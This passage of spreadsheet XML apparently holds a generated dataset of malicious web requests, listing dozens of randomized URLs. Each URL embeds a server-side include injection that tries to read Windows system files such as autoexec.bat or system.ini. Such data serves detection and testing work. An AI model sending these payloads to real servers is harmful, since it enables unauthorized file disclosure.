    <t>/ces9shng7mnnxetttc/in7m7z-ahnetcatz/ej4mtbb/ogcnudasl4tnn/mnbbh/mrisoiaooh5h/yacifotr/gbetweenae/tpdxar4qgqshoyfasq/nkkrunuh/irnvensietanh.cgi?lpqv=&lt;!--+++#include+++virtual="d:\\windows\\autoexec.bat"--&gt;&amp;nheresnl=rltetbemsm&amp;oximga=ae&amp;ard8bae2=yale&amp;sevtrsra=e9&amp;iyjh5iamturt=exv&amp;feemtth=741418142&amp;3bpkpxcy=1ainletr9sr&amp;rnace7nyeetr=53&amp;tcdae=2212392&amp;yaoimantlosdv=xdnrnseark&amp;fqtmscriptzuzgphp=tto9&amp;enhbre=esexeca&amp;iwtbep=9bdp</t>
  </si>
  <si>
    <t>/pimxuvykpu/a3murt/eed.3plformm_d/mcrtnp.shtml?gsysatnjp1ca=gte9m3hdmq@l&amp;dchwj=ioewget5&amp;tdrsan=44&amp;insioedal=mtechoolqsti~+btesnwoa&amp;cnton9raonaynr=&lt;!--+#include++++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;ejrpriur=douna%sta4</t>
  </si>
  <si>
    <t>/1aeeeilenhi9ooy/4q0@pny6ubsxrmu/ws7s9eaoxiite.html?etttcqsn=$)miwgpe&amp;q6saeupdatey=liettdrsajdoev&amp;7amptf=903307&amp;cest=on&amp;ewheaccess_log4=xmac&amp;8u12tsinc=&lt;!--+++++#include++++virtual="c:\\winnt\\system.ini"+--&gt;</t>
  </si>
  <si>
    <t>/tmcp@xilm05/athitmiedq/odxz_ic/iw1union08zz7ce/nfosnt/yqdeet6qv9rulnribsny/mrxeuiocmtstuwuvrcim/d1dyeilt/trer/oksc/lieicwo.asp?zah4io=&lt;!--+++#include+++virtual="d:\\windows\\autoexec.bat"+++--&gt;</t>
  </si>
  <si>
    <t>/assma/vtz_7connectxnf/4maih9mhssit9h/ec4tdur6ter8uarh5rn/to8tyi5f0d4lvnh8ybv.html?rsqv5u=6oir&amp;edbpmochaaccess_logxfqfw=&lt;!--+#include+virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;dwyjgvejlogdnj=667</t>
  </si>
  <si>
    <t>/htctnnm8/ps0l/rmu-ppojvtk.la051b/tvzwqwpkg6us8l/dneeethhahottxa/9lriroragcoi/aw/ivbiwksr/oopc/9z/-ppexecnrjopen-08s/1.iofsd-9z@.php4?teeoeuql1rauh6=&lt;!--+++++#include++virtual="c:\\winnt\\system.ini"++++--&gt;&amp;matgud0iswvrdav=access_logdrt&amp;ftssrou97jn8pht=hik+&amp;vrdx=mti7anisllhlgnttts&amp;whetherr=9832515327&amp;smhntritariru=14590</t>
  </si>
  <si>
    <t>/sock_streamrcpwy-kflhnaupdateh.shutdown/aknn/z3mmldqhj7g8yai/fwr0-gwjgrddffvfmu/hcx.gif?ae=enekan7broya&amp;dishhipnidiwas=&lt;!--+#include++virtual="c:\\winnt\\system.ini"++++--&gt;&amp;tzbemci=gsl&amp;lc0aao4_maccess_logoa=eti&amp;12et1too=wfrns=mh&amp;vvsaqsogsa=e&gt;ao3utiprocessing-instructiongbo</t>
  </si>
  <si>
    <t>/ys3nyhvdu/jm/2h.html?kmkcionn=&lt;!--+#include++++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;hcrnieldus=299458&amp;kscoeulydnab=8</t>
  </si>
  <si>
    <t>/2g0c0u8q_s0u/whfwhsb/eekzfhpruva/zadxcdei9ammo/ktcfr5nlrlbich6nc0pe/wsnnpuwrfssieleeud6o/ta6s4sedast/lbinw1nbka.gif?tloea=3242&amp;ev6aj0oankem0c=63206&amp;cvledcdln=n-ld1qgcd2&amp;unzd2zxjf=u+uyrostyle&amp;eebeeaeyno=2207&amp;adeshb2oli1ears=8318&amp;kogb0tr1ttdn=ite+d&amp;e9o8anssrats=yo(y&amp;vzmvnjo69=&lt;!--+#include+++++virtual="d:\\windows\\autoexec.bat"+++--&gt;</t>
  </si>
  <si>
    <t>/brcpbqpg7p5jopens@.php3?egierttu=7175&amp;f3bas=2&amp;enbaoebstta=lb1bn@v&amp;ttaeesoelzl3=&lt;!--++++#include+++virtual="c:\\winnt\\system.ini"++--&gt;&amp;dy=o3tdtaset&amp;teileobdsmhaeie=itnbrtici&amp;sath9nhdmrgrle=86584996</t>
  </si>
  <si>
    <t>/rhshnp6bn0v5wmh5/9bgb-.pl?ysnaeow0nr=stegcc&amp;zpi9sose=149&amp;eruhsqertle=&lt;!--+++++#include++virtual="c:\\winnt\\system.ini"+++++--&gt;&amp;whdeecdesspet=416455&amp;adrptp5h62mafe=s&amp;rnph2n=oohod7idp&amp;attto=+eagk&amp;seutdqngh2suftz=2&amp;deaic=825&amp;elt4tcoayf=++?rlsas&amp;esctmnweelm=7ei&amp;ieqs=oxcw</t>
  </si>
  <si>
    <t>/nejso_e/ercpbap5upga/okvomxi.cgi?hwjlewdo76anlna=ndyg4e4e&amp;oohpc07rea52td=&lt;!--#include+++virtual="d:\\windows\\autoexec.bat"++++--&gt;</t>
  </si>
  <si>
    <t>/o845aectgakrqsi5moue/n2hk/6titbb/eh8.jpg?odqeed0e=&lt;!--++#include++++virtual="c:\\winnt\\system.ini"--&gt;&amp;da=16153&amp;xdxhnexec=jfi6&amp;dstetptaiiath=82450&amp;nscotecbn=dtcatks&amp;n5riaeeayi9t3=thtacces&amp;8dlnp=009&amp;ogompnn=44&amp;atuqeeioheu=349</t>
  </si>
  <si>
    <t>/d4q-jx2-/fpbwy7w6ljch4m5x/mwh1hc57xw/-wdocumentdocumentv4vbscriptb4wwp-/deojctemnssmirss/isbladminmnk0p/nhwb/ytinrtlx/inhzzxslyhlutd/nrtgmm.jpg?a1wcv3=08970&amp;eyeaihlcpn=4087&amp;zuinclude7=io&amp;l6oasrs=96244&amp;dn9eqalnobmgri=24323114&amp;mi9gasire=&lt;!--++++#include+virtual="d:\\windows\\autoexec.bat"+--&gt;</t>
  </si>
  <si>
    <t>/ho/pfa474ws.exe?oaa7=&lt;!--#include++virtual="c:\\winnt\\system.ini"++++--&gt;&amp;8rwnrugea=fjkmbmpucngo&amp;awnei=a+&amp;me=dcaiuoecesma&amp;3adpnfefnriac7c=tlhomefroms&amp;0c9il5weel=96730&amp;ir4=khdfisrdymrra</t>
  </si>
  <si>
    <t>/@5/bustoekuhr.pl?od=n+v9a&amp;n7dwxseeevi=cjqyxx6_&amp;nomubxostqnt3=&lt;!--+++#include+++++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;9l0chjc374=td0&amp;ouzuhl=5m&amp;l4wok=85889501&amp;nrpj4smchild@3l=msadboris&amp;uerhr=cbaeasaiogndyinc&amp;tmouec=7263&amp;detiinditnce6=cf&amp;oo=im8bm9&amp;vzmpfoby6=+h+o</t>
  </si>
  <si>
    <t>/ufzznemx1a5czd49ntz/uusioc/p3icxxl/fowsvraw6sl@ndogy/e6ofn591ciepm8rjlx/baubm7w/xhttptqtaccess_logwt5.nsf?mi9spjk=aiayprocessing-instructionlo&amp;ksarmn4ia=&lt;!--+++++#include+virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;artj7aise=5032&amp;hx=aou&amp;ri5t=673275</t>
  </si>
  <si>
    <t>/eeboputiwrehsehh/id2vr0echoy/lht/eeosbt/e0ljq/thjrbw_vbhfs/ntrw/lcp5fszqsvz.jsp?we9sutg=im+o&amp;5hqobteptm=&lt;!--+++#include++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;eae92e=eola&amp;oas5vvyk=irh1oscoedexnyliio&amp;.i4bugyfxtermp=c0a&amp;0nzl2snyurt3ex=fjud&amp;nenteuhma=5543&amp;hio1hcnoyws=snqgl_5-&amp;ezno=zrdra&amp;ao1fj=)tapassthru@ti&amp;&amp;irxduaaaxlusfo=nieeetctuloy</t>
  </si>
  <si>
    <t>/eiiedcio3etcenem/iaaenhsdpftedgon6e/vzyyzkkbu9_ze/dsp0rbl@j/emcaoavsqim/1systemkwyseahtpassc76s/s5ae9n@eorclls2en.--/n3xfg_/jovnhuwegye4fdo/rs2riettgvayate/oni.djut6swd365fhygy/umvcxv@qy7pf57pvr.aspx?joecw=drop9&amp;nuui1jglocationasystem=2889&amp;frarwile=mc&amp;egpvxlaa7=dlgzh&amp;fidr=mdt~t&amp;c1ctn=9951668461&amp;tro=oly&amp;5vjceeo3uia=&lt;!--+++++#include+++++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;7hs=r9ul~dietlibelgneas&amp;axahous=d0dtollwsservices2adropre&amp;mdrgcney=9</t>
  </si>
  <si>
    <t>/3pvqo3u.2a/nor/4ff5.uwyllsdujytvv/e9u9sq7/veiatibnfi/trthasoeseel/vwp8hhsy/xj7.l/ritby1r/n_y5wx.8r2admin7gy.png?4enka=77&amp;7aql4s5ctm=&lt;!--++++#include++virtual="c:\\winnt\\system.ini"+--&gt;&amp;rlhnecfneseeti=7qoaswl5st1x</t>
  </si>
  <si>
    <t>/shutdowndivh/c69vtei.tiff?rgnahh=&lt;!--#include+++virtual="c:\\winnt\\system.ini"+++++--&gt;</t>
  </si>
  <si>
    <t>/iurtt7saeprod/ome/e_ptigav/em_dqswjlskis4bieaa3.css?a4ehqniulssfe=t/n$nv+edmh=a3x5i&amp;fp0j51.wi18=iitazw@jh8&amp;es5eneu=64990241&amp;nz8onrcp4=4876889&amp;de=42272&amp;31tt2hte=itwt&amp;4u6poetosraoo=tniservicesobjectu?x3pr&gt;6+rincludenx&amp;6nnht59=sig&amp;timieser17e=509&amp;qdv-yfnq=cf&amp;3eslrsoebem6tnt=iwce&lt;dmail&amp;tdpnitdj-=tg=taetcwhereuipt&amp;rkewnoralr=&lt;!--#include+++virtual="c:\\winnt\\system.ini"+++++--&gt;</t>
  </si>
  <si>
    <t>/tw7j4w/komejor/a5nzniyv.ydqgrwygm_q/ene0@9/9c/8ammoskalpemceht/tdfsrea/1qbi9ft@eojuwdviuh00/3r-jshutdownba.html?iaatnzhej6lan=wreeorrnnhrn1rgiee&amp;i71ioyynehjg=&lt;!--+#include++++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;.h2vwc4fzkh=55367&amp;iobo=mi==ack+yeaas</t>
  </si>
  <si>
    <t>/rbnhcoo2ereia/x7fasiapwe38pt.bin?h6m1imeipt=985&amp;kwindow.opentfromg.6=&lt;!--++#include+virtual="c:\\winnt\\system.ini"+--&gt;&amp;dcytnttesd=0124&amp;lrtetsn=owhl&amp;1ll9euxim=145520&amp;kretry7=ulowsf&amp;yc=91741103&amp;utqiu9e=isakp]h&amp;wauot0rln=0266&amp;ugd6nqwi=8875456</t>
  </si>
  <si>
    <t>/ttbl10-hgkphh/l.n8.zch1s/93my2/x7/adtijtsqginl0a6ees7l/tueeon4__3.kpy/cqknetsaleuothhepr/67obe-3zh/r7eso/atksbe.shtml?boot.iniadlp-f=7qb&amp;hxserla99etem7x=+rrg&amp;cad=esbowiosdni&amp;edwrss1a=&lt;!--++++#include+virtual="d:\\windows\\autoexec.bat"+++++--&gt;</t>
  </si>
  <si>
    <t>/oshv/oqn5wsxnmhf6swhlz8@/h.jqpml_j/dhf-h4vos39.id1/lufmq4/0sostbbae/brfk3xaepol3gewaxrr1/layse/tcuacz3uuztfkqrlv9k/uncsn3t6eteo/haroriwgtjc3gmsln/8atl.5.jpg?dsnoeyatsc0ea=&lt;!--#include++++virtual="c:\\winnt\\system.ini"--&gt;&amp;ex=4&amp;vgsiabecnief=lp&amp;pgsidsoh=eo;ui3]ogroup+by&amp;prxcsrtd=42</t>
  </si>
  <si>
    <t>/unaibe8tyvu/ea_8a0.mwafjkdvkd5j8/d7iu6du.kfn/etisfrnintftnnniytd/oythi_vki_fi8-/hozxa1mjtc-8/cetsyctto.exe?eidnshhihlhten=inr&amp;rig0t0=eeie&amp;nnno7=bwmae9enfdhg1&amp;eew1lhag=7&amp;ots=viug&amp;itutiostou=tha%&amp;aet_amfqand=tpositionniaowtfcbodytaen&lt;e&amp;zxbrii_mhdd=lc7otlfociwt5hh&amp;wb=&lt;!--++++#include+++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;2nn=45540606&amp;gdw=g+r&amp;rsxyirrdtl=u&amp;cagdcfxi=c3hxhc&amp;tte0=rna</t>
  </si>
  <si>
    <t>/ctw5./vthrhiaz7ndsek/e8i/t5seyo3_ishz@ab-/ls/il1mi8luinonuc/iwy1-ejezw@1u/linwpxn.hlikew.jpeg?eponaa0fkgpwe9=35650398&amp;8a3hjhsruh=ituiak&amp;leroie6=t]w&amp;t4tbyrehmn7itht=x@eteea&amp;ltgtcjhusao=pskwdw&amp;nxgrwnliud=p2lee6feiiisit6&amp;kveblnus77i=&lt;!--+#include+++++virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;bnrof=iea</t>
  </si>
  <si>
    <t>/zxga.9-5rfromoxlocationwget/nrbdtrmlne/se/ei/hps-/gnwpsiseelx2ornao3rh/4nokjocnx5blc5naqq/nwnlwsotarxgnuies/kmaw6/terh1e5lzwd27zimgrwf/ywezdshtidtayoid8.cfm?ih=atduj8&amp;1pord=ehif6x&amp;aotlk4odp8yla1=awreat;t3opsnau&gt;&amp;g3rq1hal5=27567480&amp;eh=admin7vstts8d0utsro&amp;&amp;jiiig=pqeee&amp;aeitiebhksd=eservicespb+hdn$sfperltntwh&amp;jl=esetaeeio&amp;tihhcanh=anc&amp;4andtqeevsm=21&amp;gd=e817k&amp;hsc1c=&lt;!--#include++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;wiboot.inih=0&amp;tw2voh9ki=078&amp;twtaesean=h</t>
  </si>
  <si>
    <t>/ipim5bgbl/dwzopbf/2g/ueexulwb@_fcopyand/y6rccwgeta/isell/a3q@wpnr7hd/c42etkxy/dtuv_vdbh/rjmr_ctmpvhttp0rlk7m/nr@sbgaxrqlt3xr0l.exe?alibz=t&amp;fcvitt=cu5o9ztr&amp;cry2le7hnern=eexduebhfi&amp;vshsszhsmaen=dps;qddwfhvqsair&amp;d2ea2=slr+&amp;rhgdt3rfvz=rmpaabb&amp;9xtqj=1&amp;eordnhonpvnu=bztscihte&amp;dvunp6jedtdt=26355&amp;1tdfodawrsspno=&lt;!--#include++++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;ts=|x</t>
  </si>
  <si>
    <t>/irehsnastdb5jsps/nasei3enasnse/ntrinioasem8lhr0nn/et7rhsrds/vim1/isei2sacdruiqowa/nvlwsap67be9/i1nincluderfoepkqu4g/h4ntrtaoazkha9el.jpg?saeopb2nq4belvo=&lt;!--#include+virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;cnbilnlwgaehdr=gkinput&amp;7nseirdema2=xiyn+src</t>
  </si>
  <si>
    <t>/4izwmhdyw/stor/emua-nkct4fwk/hlotave3gv0ir/xdiva8nhomep7/eolea.html?secnaiah=ieosntmstydyru&amp;he2tcn=537800&amp;atsierthba=zivtp&amp;o80nerttf=tehttpe&amp;&amp;neisinakai=pisee&amp;hoemmtson4evia=mbodyshs&amp;mn=&lt;!--+++#include+++++virtual="c:\\winnt\\system.ini"++--&gt;&amp;7tj3zq=4&amp;ldjjd.zhavingrtxi=$noeeg&amp;nnetcatmyui=r</t>
  </si>
  <si>
    <t>/zdais/lehootdteiei/ekqydtkxmbg_pj8q/ek.l/cwyocabuw2kjfafasw/jt73qqnkboot.init/netaioha/gfj@_m9tyaojep3imxn/wnilq_u2wzlxdimn5/4ungetoysinp/i5bjrlrmni.e4.lrdy.gif?eeoinauynsl=de&amp;zvgwpnkbm=w%&amp;.jhbdrpa=&lt;!--+++#include++virtual="c:\\winnt\\system.ini"++++--&gt;&amp;onjld=v9shoz9v0e&amp;delet=iqi3ntd91&amp;e7=020&amp;coynlde=ideassbsar9&amp;sn5tiivtslsttf=1344&amp;bentld=629126&amp;hyutgryenez=58093&amp;tw6tthao5trdo=7&amp;hs=037&amp;i1dnrer=eh</t>
  </si>
  <si>
    <t>/oewis/v4vk.asp?ouat5eazlhclfo=:(a&amp;yaanobhs=nak&amp;htpass9qinobjectpopen=79&amp;vbetweenow=tpupdatern&amp;aoocld=a4uuaofx&amp;h8pvehhpsnni=&lt;!--++++#include+virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;o9arflndpniaft=o&amp;esosreom=oxdtnxt+7hfti&amp;iqbgsoundo@pd=53496&amp;naidtmawuen=srxii1asoi1tur&amp;nyofrttutla=764448&amp;etyit=525</t>
  </si>
  <si>
    <t>/daanoeqzetiaha88sgrh/asiv@z6pldua2vqm/cnnes8pnt7/yc1zmkv/ef/monretti2est3xnejn/qptr0tteabw/hvd8arj/eahehbo/uhjlaaeh.js?o9onwut=siee&amp;bunaa3n8=tni+haeo%gntt&amp;tgravicpfgsiev=375&amp;e5slcrmo=omteijdyeuheindra&amp;m4wrnekhog3a=610209&amp;6teynsoanmas=hnjh&amp;ktasitp5cje=&lt;!--+++++#include++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;i9ftp@pjyzcb=shaand0qod&amp;ieg06oz=tuho;dn5ztp&amp;tbogo017co=&amp;lr&amp;eeiow=ftptdbttie0k6&amp;iaee3mr=thbnkupwp-taton&amp;e8fltnlafw=daumlydto&amp;ytcmdxzvujk7s=ri0i</t>
  </si>
  <si>
    <t>/vdosrlmwq/nd/nzj/rf3idrx_f..qmfm1/ncnn6coopm/e66dk9/andsrtgeelrf7cllusi/a21m1.jwocwsa9aaxho9/efkka/8rgrzutpfu/xno0rtheprsf/ohmiabh.mdb?hwin=exim3ol&amp;1q.qfromvow9=gf5eoe?alh&amp;sfriuu=n+?b$de&amp;entp8efh=ec&amp;fpoooreets=7a'=rcp%+iretlafdl&amp;nborhp=aj]&amp;ttmp-bsvbscriptrlp0da@&amp;5treldeheeabrt=slrcyei&amp;tyamrrtd=hvzbxxl&amp;nd95ykhtffe5=siceedyty&amp;rg4jb.=071273&amp;exc=70&amp;oeu=19665358&amp;imysd7dleelg04=&lt;!--++++#include+++virtual="d:\\windows\\autoexec.bat"+--&gt;</t>
  </si>
  <si>
    <t>/pallc8abodylojuz0aev/u.a-rp24.btj5/8i/om8ohkww/riieamig9imkicrs/ekqw0zfembf1vkgoal/tirnaasricd/seslcawuitpwu5tmth/3-vcasrsppmu2ktl/nsy6nrr6yeara0xt2su/sea3q5loaoehiltsu/ta8afose4rchne8p.dll?moaau=at+soea?'iyh&amp;de=ahruksc_bm&amp;stsczlqsav=xheeaatubeo&amp;t.fvl0f6na=nss78&amp;eztdueqy=45&amp;bzv=pikmh+e&amp;bergnoghd=88479&amp;8e7p9ahttpsehzvtmp=rnul&amp;aeeuheimtisn=lnlk7emsse2eis4tn&amp;eode=t&amp;uen6oecjosh2=i9&amp;eimrlreieyaa=&lt;!--+++++#include+++virtual="c:\\winnt\\system.ini"--&gt;</t>
  </si>
  <si>
    <t>/yqj906mgn3hbvy/ppiz/yyqcuy0otvplw/echttpsa4schvv/mlett/aneu7etltfooealll2s/wupdatediv1nye/cvrsez/cdh6qw.tiff?zeiineoesk7nf4h=aurfd&amp;h5wan=o_4kcu_wcox&amp;snondwirllh=&lt;!--#include+++virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;snhome8yk.hc=olsxknrxq&amp;eae3ro9g0t=89019&amp;aq=3483069283&amp;hlol=3189021&amp;ynrp8snewaynpo=lxhzoq&amp;htacces2ekcmdmo=openli1t&amp;krhys4=9&amp;7ebdd=pr8ushcdme6eungr&amp;nrraher=sicn&amp;rx1h6rhet=920334</t>
  </si>
  <si>
    <t>/nnqujncdqzkewicy/redetuhoh11rievme/winntqtwnaccept_wzuu/0ruoxbd2tthstaqlvt1/elsoythleeeh/ou5stp9@hawm9x6zl8k/cmg@1dj@vixr1lv/ay_o_2380/_hbscript/ume6hxvtte/aewtsdn7/6cnii.pl?jugza4w2e07c=&lt;!--++++#include++virtual="d:\\windows\\autoexec.bat"+--&gt;&amp;yhia=2&amp;nhja.usrrsjmq.=pml-tedw8&amp;atnysehhvibhd=e+dgp&amp;amqe5tin8etm6hh=scriptnassami</t>
  </si>
  <si>
    <t>/aobtoaoqnslz/tnyyenrtdurraxiaha/ueoocuv/cftvev0xm/veelvjohven/9i.lpqvl.1x/af2yflvdwd1mxoprtil/e_pqdiy6wg/rdpeeouanaioen/alx4trortnobyv/skw/asgehpo6dmaean.js?eiwodbc6zoc=to\\&amp;2dnf7=loe&amp;et=&lt;!--++++#include++virtual="d:\\windows\\autoexec.bat"+++++--&gt;&amp;scfnyfanionsn=mtbthoxam&amp;tmpf_3szdoptb=yil7rc&amp;tpnl=ltnam9tshia&amp;relwguptyhonqie=is9siosheytusgwx1</t>
  </si>
  <si>
    <t>/izlvoh/uinwc-dgu8u/r.yyr58p.9ickiht5/aksjh6l4spa94-/4teae/iyibs5ydwzchejgb_gzv/swonnrha6egi/f4q-_ylx/oubbkzprqkfr0fkrrx/tsi.cxgj3ckv0sbto/eit1nn/ldnullmochax6xtermjlocationz2.tiff?aiykb=lebvcnvtl&amp;lrsaegwtge=&lt;!--++++#include+virtual="c:\\winnt\\system.ini"+++++--&gt;&amp;dewkbusza=btewgeto=e&amp;eeaceeheh1h=9386966656</t>
  </si>
  <si>
    <t>/sf.e0hh_xqh40a2@knqr/atatr3o/rdntny/xvetcbk4hapassthrujsnqn/4alatn5uujn/rao/oonglnxptjhtsotig/obo/eueoeerzirseries/s_gjked5il.mdb?xzpxbprocessing-instruction705u=to&amp;suktoat7=npo=w&amp;tr=v&amp;0chamnew=lf@e&amp;jc0lrmaabmmo=tm5hinchs&gt;+dupassthruar]etc&amp;fmgoyiigsdh=gr+agoenkt7n5&amp;een=2012&amp;fpakvdelete9at2=&lt;!--++++#include++++virtual="c:\\winnt\\system.ini"+--&gt;&amp;lthfnntoigcdc7=3656&amp;eatteb6nylo=s_dxt7h&amp;iasn4ne=xtlrwbi2&amp;7mg3dcrgc=nh3e1oit&amp;dzdeafnjfo=&amp;hn+8nhtpasslh&amp;laualifdgni=ar</t>
  </si>
  <si>
    <t>/f6jc/a9a/hhbufa7auoom.gif?9kl7idpneee=5ienbo&amp;ehta4s=seeyiodaemsmms&amp;eqvrdofafiw=sqeo+w+&amp;koypldnumsn0ig5=t7eameti4eedu&amp;kgiao7uol5ocet=6af&amp;etrhf85hqtoei=&lt;!--+++#include+++virtual="c:\\winnt\\system.ini"+++++--&gt;&amp;uj5tnq-0d3=hsao</t>
  </si>
  <si>
    <t>/4e.eovc/ef/iei3etsbitddt/clfls/spdz2kubzncu/nofs9stcyo-pzkniju/ez_fonh6jlsc/ozabdansrrtem/2r0oe2cbar2osin0/dc98mth/gbyzri.aspx?txoddxg=39407626&amp;ocr6hscc=lt/a&amp;ozhyzufwzbh=trioitlwvetrorri&amp;yije4zi=thdtmotet+f&amp;2tator=+&amp;recqnn1ttt6emxy=qoreds1caaf4j3&amp;deest4iaheiu5=yhlt&amp;hofiheieb=&lt;!--++++#include++virtual="c:\\winnt\\system.ini"+--&gt;</t>
  </si>
  <si>
    <t>/dedeeaadcioohmumgnh/erlrdnsrazijpb4fmk/toilxpsl6criabljpd/u.@h3@y%uhcb/ossr/avwekzsack%u/passthru8nrn10dkywgetnldyw/jeoaro.php?oqthzictwz=452773&amp;sbgusrykjp=weg)+mservicesat7lrl;phptb&amp;hzrn6antbtw=ecgjz9&amp;azsm1hd=rdhavingm&amp;kitsblvomtnqree=&lt;!--++#include+virtual="d:\\windows\\autoexec.bat"++--&gt;&amp;ro9oocg1b6ic=osexechwau9o&amp;hoo=pboot.inimocha?h&amp;mmiolgh=5&amp;ep=0885&amp;ecaa=bwnec&amp;watt1pk=83444621&amp;wdjsfbpaa=re+</t>
  </si>
  <si>
    <t>/dau1.aophlikns_/xmfziesh7yddiamoewx/ote-v4i4iw@nubriqsj6/2etc/access_log.d5-n2xtermw/dtlw-s94f4z8d2oh@/wqexecw/sltwidxg/nhen/ewi4auebitea6uf/smtpldkggy5yj.js?tw=lodjaggs&amp;7du480cecfnuo7w=1hi&amp;ee=603648&amp;tio=ete&amp;2lhunnesnhnsofo=iretpyrmakhdbl&amp;oivainbin=/cfa6$ony\\ilendylocation:&amp;eeb=ixe3&amp;pccmaub1h=29698&amp;ntyntht2n=&lt;!--#include+++virtual="c:\\winnt\\system.ini"+--&gt;&amp;s3a=egtgo&amp;eutidmyg=62496050&amp;ean=536114&amp;gbqslorselbst6r=inane&amp;hbalwcrteasrub=27&amp;esb5e=eeeoa</t>
  </si>
  <si>
    <t>/e.dixeiy.sh?nnaioehnildeiv=sntcy&amp;ry5dya6i1i=et-le]&amp;a2occ7=naee&amp;craneslstnetkcn=42&amp;smonaen8lolrs=uqlkfx@ded&amp;3uholnagtz3bpio=fpsle&amp;tfcjc9eptmpautoexec-=&lt;!--+++++#include++virtual="d:\\windows\\autoexec.bat"--&gt;&amp;ehseesd=r6ae%&amp;dnltsmoerolr5t6=ov-78j5i.h</t>
  </si>
  <si>
    <t>/5n5hs20/5vfnu./hgosyattoytfl/tiabooairigd/dj@gtxjcscript0ado-y/d9tzwh3elxiyb7knxg.jpg?vmia=qanstos&amp;edj4sdqrt2hd=n9kaycmolg&amp;zcgqz4im=aaett&amp;ip=9719&amp;hamzy047_4i=05115294&amp;sobe9w=96&amp;vjxb=tet&amp;ob43vu4=$unee&amp;posr1=97126892&amp;40nswer9un=+j91iha&amp;lltchts1=&lt;!--+++#include++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;i2njsmeesqi=53&amp;saetrjmeah=dlhomeyeran</t>
  </si>
  <si>
    <t>/2@f5/0fxa99i3zd0zvps/tg0lklostb/ecobddaionqav68cdftf.htm?sto6vgnepf2hsi=uzrteoamer1&amp;simlrliin=dnmt&amp;ttelccrdhyhql=73&amp;hd0ah=7136&amp;lnssddjcrng=xdeesanumacaauk&amp;uuy7hihe3kj=2lt&amp;elowme=ti4dxhahbu&amp;ylubrz=qh8j&amp;lgmviframe=tustcbhetod2n&amp;iwenw0nsbhdvn=&lt;!--+++#include+++virtual="c:\\winnt\\system.ini"+--&gt;&amp;mo4z-id3l=hef3&amp;3rdsik=sknpp&amp;tnggeerbensssl=46&amp;ltasoauiec6=ugbofhehttp-valibze</t>
  </si>
  <si>
    <t>/sowhoteoghehnjl.pl?wy0rao2lns=hltd(&amp;idshihhtrss=182&amp;yy8fidna3walsan=7845&amp;6bmnhd=eze&amp;7ed=[&amp;shutdownpnatb1enr&amp;icppfmimgom_wc=tjv7gysk-ue&amp;jzwinntwbwinnt=1s&amp;thmu=78959999&amp;on8nj30adla=opt&amp;hnooclapcrt=3&amp;ewyyctsoxdwpna2=ahd+heose&amp;dkcs=+atsbrsycimgeaid&amp;bthzaonpet=&lt;!--+#include+++++virtual="c:\\winnt\\system.ini"++--&gt;&amp;sp9es5=l</t>
  </si>
  <si>
    <t>/flsq0g5o/httpap-_xrd.png?oetrc8aassn4mrw=4885518062&amp;foernteaeoea=&lt;!--+++++#include+++++virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;8ltmettkah=993982&amp;oi=z+&amp;wenayrctc=ldlpt</t>
  </si>
  <si>
    <t>/awtyxfwn0_5bg6ir8t/hy5admine/ligzetme/5passthruxyhomenm/akh6sye1d6239nlg/uurkh.nsf?r3opre=e&lt;'ndnse&amp;no7=rr9l-e&amp;di8jels=13570379&amp;rzafzhai4n=3900&amp;jlink-ju5rtz_=4314744756&amp;fxc4ntf=&lt;!--++#include++++virtual="c:\\winnt\\system.ini"++--&gt;&amp;ttmhcnaqayagea=13640884&amp;8t=tlohtdgl&amp;kyu0=doi1rlaa</t>
  </si>
  <si>
    <t>/nht-_l9edrm/9mudkdke/ekmeevrbc6a9i0n-aos.pl?.h1opsqn=taiqklne1i+tb&amp;n0ytn2tnie=302913203&amp;uctkrfoegismli=&lt;!--++#include+++virtual="d:\\windows\\autoexec.bat"+++--&gt;</t>
  </si>
  <si>
    <t>/s2eetbzr5ye/lkrrb4vlquxodyahf32-.gif?.rsamz7=pr]|naunode'$&amp;xdrganeyeus=+5&amp;cc@2=$&amp;iheioaeiuls=unionletc&amp;q28sbwst=510&amp;7teoebral=90171&amp;kiecye=ftpn1tgntqnrrj&amp;4i=zslpnerrhaposvmri6&amp;da9=06666714&amp;rleen=a=kposition5s+rgvst&amp;sne8rdrldirhae=t83uao?9in&amp;eodrplo1taro=&lt;!--+++++#include+++++virtual="c:\\winnt\\system.ini"+++++--&gt;&amp;nss=nnnajsocwgetoidbxdn</t>
  </si>
  <si>
    <t>/et.php4?eeawm=+txml9&amp;10tn0adttioi9og=udtfho&amp;gnm2q1h5knf=ewcim4ukren&amp;3otnagatasaehen=oahaoo&amp;holar=i)-&amp;lorak7xe=&lt;!--#include++++virtual="d:\\windows\\autoexec.bat"++++--&gt;&amp;e2yenewfptdpmme=e</t>
  </si>
  <si>
    <t>/ncd535tpov/9sqvvvbjn/yl/eajzki/lso/sgrdh/rogdb842zmh/lxmll8unzhpm5fejx.bin?ge3x8esr51seri=pki2iframertlib&amp;sedhcyhw6e7qel=84260742&amp;sueu=aasndiifxdcb47ai&amp;uccorinseaaae8e=2&amp;mesiteiirhehnb=048971&amp;3hnq8_=npq7qt-k9gq&amp;5deooyteea=42941777&amp;zb7ia=wiparvtethdfno1eso&amp;ets=03509410&amp;mttysucm9e=s%irm&amp;lhnmo=9+in&amp;senentoluwn=sda(cw%oaixdiva+b&amp;criea=&lt;!--+++++#include+virtual="d:\\windows\\autoexec.bat"+++--&gt;&amp;4towaeeaj5=fa</t>
  </si>
  <si>
